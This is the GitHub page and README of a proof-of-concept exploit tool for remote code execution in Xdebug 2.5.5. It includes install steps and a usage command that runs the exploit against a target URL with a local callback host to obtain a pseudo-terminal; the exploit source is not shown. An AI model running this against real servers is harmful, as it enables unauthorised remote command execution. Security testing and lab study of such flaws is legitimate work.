Skip to content

D3Ext/xdebug-exploit

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

15 Commits
LICENSE
LICENSE
 
 
README.md
README.md
 
 
exploit.py
exploit.py
 
 
requirements.txt
requirements.txt
 
 

Repository files navigation

xdebug 2.5.5 RCE

An automated POC exploit of the xdebug 2.5.5 RCE vulnerability

Vulnerability

This vulnerability can be abused due to the eval command present in Xdebug versions 2.5.5 and below. This allows the attacker to execute arbitrary php code as the context of the web user.

Installation

Download from source

git clone https://github.com/D3Ext/xdebug-exploit
cd xdebug-exploit
pip3 install -r requirements.txt
python3 exploit.py

Usage

Just execute the exploit and especify a valid URL with a PHP file like index.php and the local host. Then the exploit will try to establish a pseudo-terminal which allows you to execute commands

python3 exploit.py -u http://10.10.10.83/index.php -l 10.10.16.3

* In some cases the output won't be reflected at all and you will only see the first line of the executed command, this is not a problem of the script, the vuln works like this)

References

https://www.exploit-db.com/exploits/44568
https://www.tenable.com/plugins/nessus/112210
https://www.rapid7.com/db/modules/exploit/unix/http/xdebug_unauth_exec/

Disclaimer

Use this exploit under your own responsability! The author is not responsible of any bad usage of it.

License

This project is under MIT license

Copyright © 2025, D3Ext

About

xdebug 2.5.5 RCE exploit

Topics

python php exploit xdebug hacking owasp rce vulnerability ctf offensive-security hacker kali vuln mrrobot oscp black-hat hackthebox xdebug-exploit

Resources

Readme

License

MIT license
Activity

Stars

29 stars

Watchers

2 watching

Forks

9 forks
Report repository

Releases

No releases published

Languages